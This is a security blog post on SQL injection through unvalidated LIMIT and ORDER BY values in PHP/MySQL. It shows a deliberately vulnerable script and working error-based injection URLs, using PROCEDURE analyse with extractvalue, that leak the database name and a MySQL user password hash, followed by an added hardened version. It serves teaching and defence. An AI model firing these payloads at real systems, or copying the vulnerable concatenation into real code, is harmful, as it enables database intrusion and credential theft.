
SQL injection in LIMIT and ORDER BY

January 26, 2015 • Security

0x1. Exploitation

Vulnerable PHP code:

<?php
error_reporting(0);

$conn = mysql_connect('localhost', 'root', '123456') or die('database\'s username or password error');
mysql_select_db('test', $conn) OR die("连接数据库失败,未找到您填写的数据库");
// $index comes straight from the query string with no validation
$index = isset($_GET['index']) ? $_GET['index'] : 1;

// Variant with the tainted value in ORDER BY:
// $sql = "SELECT * FROM admin WHERE uid < 10 ORDER BY $index LIMIT 10";
// Variant with the tainted value concatenated into LIMIT:
$sql = "SELECT * FROM admin WHERE uid < 10 ORDER BY uid LIMIT $index";
var_dump($sql);
// mysql_error() is echoed to the client, so error-based extraction works
$result = mysql_query($sql, $conn) or die(mysql_error());
?>

EXP:

http://localhost/test.php?index=1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,database())),1)%23

Resulting SQL:

SELECT * FROM admin WHERE uid < 10 ORDER BY uid LIMIT 1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,database())),1)#, 10

[Screenshot: 1.png]

Only one column of a single row can be displayed per request; anything more causes an error.

http://localhost/test.php?index=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select password from mysql.user limit 0,1))),1)%23

Resulting SQL:

SELECT * FROM admin WHERE uid < 10 ORDER BY uid LIMIT 1 procedure analyse(extractvalue(rand(),concat(0x3a,(select password from mysql.user limit 0,1))),1)#

[Screenshot: 2.jpg]
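The following is an added example, not code from the original post, showing how the handler above can be hardened. Two things make the injection work: $index is concatenated into the SQL string unchecked, and die(mysql_error()) returns the database error text (which carries the extractvalue() payload) to the client. The fix below validates the LIMIT value as a bounded integer, resolves the ORDER BY column against an allow-list (identifiers cannot be bound as parameters), binds LIMIT with PDO::PARAM_INT, and never echoes driver errors. The column names in ORDERABLE_COLUMNS, the app_user credentials and the "order" parameter are assumptions for the example. Note also that PROCEDURE ANALYSE() was removed in MySQL 8.0, but the unchecked concatenation remains exploitable through other error-based or time-based techniques, so the input handling is what needs fixing.

```php
<?php
// Added example (not the original post's code): hardened version of the handler.
declare(strict_types=1);

// Allow-list of columns that may appear in ORDER BY (assumed for this example).
const ORDERABLE_COLUMNS = ['uid', 'username', 'created_at'];

/**
 * Validate a LIMIT value taken from the query string. Anything that is not a
 * plain non-negative integer within [0, $max] (for example
 * "1 PROCEDURE analyse(...)#") is rejected and the default is used instead.
 */
function parseLimit(mixed $raw, int $default = 1, int $max = 100): int
{
    if (!is_string($raw) && !is_int($raw)) {
        return $default;
    }
    $n = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 0, 'max_range' => $max],
    ]);
    return $n === false ? $default : $n;
}

/**
 * Resolve an ORDER BY column against the allow-list; unknown values fall back
 * to uid. Strict comparison keeps arrays and non-strings from matching.
 */
function parseOrderColumn(mixed $raw): string
{
    return in_array($raw, ORDERABLE_COLUMNS, true) ? $raw : 'uid';
}

function fetchAdmins(PDO $pdo, mixed $orderRaw, mixed $limitRaw): array
{
    $column = parseOrderColumn($orderRaw);
    $limit  = parseLimit($limitRaw);

    // The column is interpolated only after passing the allow-list and is
    // quoted as an identifier. LIMIT is bound as a real integer: if emulated
    // prepares were on and the value were bound as a string, PDO would emit
    // LIMIT '1', which MySQL rejects, so PDO::PARAM_INT matters here.
    $sql  = "SELECT * FROM admin WHERE uid < 10 ORDER BY `{$column}` LIMIT :lim";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':lim', $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connection details are placeholders; a least-privilege account replaces root.
$pdo = new PDO('mysql:host=localhost;dbname=test;charset=utf8mb4', 'app_user', 'PLACEHOLDER_PASSWORD', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

try {
    $rows = fetchAdmins($pdo, $_GET['order'] ?? 'uid', $_GET['index'] ?? 1);
    header('Content-Type: application/json');
    echo json_encode($rows);
} catch (PDOException $e) {
    // Log the driver error server-side; never return its text to the client,
    // since that text is exactly what error-based extraction reads from.
    error_log($e->getMessage());
    http_response_code(500);
    echo 'internal error';
}
```

With this handler the payloads shown above are reduced to the literal string "1 PROCEDURE analyse(...)", which filter_var() rejects, so the query runs as LIMIT 1 and the response contains no database error text for the attacker to read.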
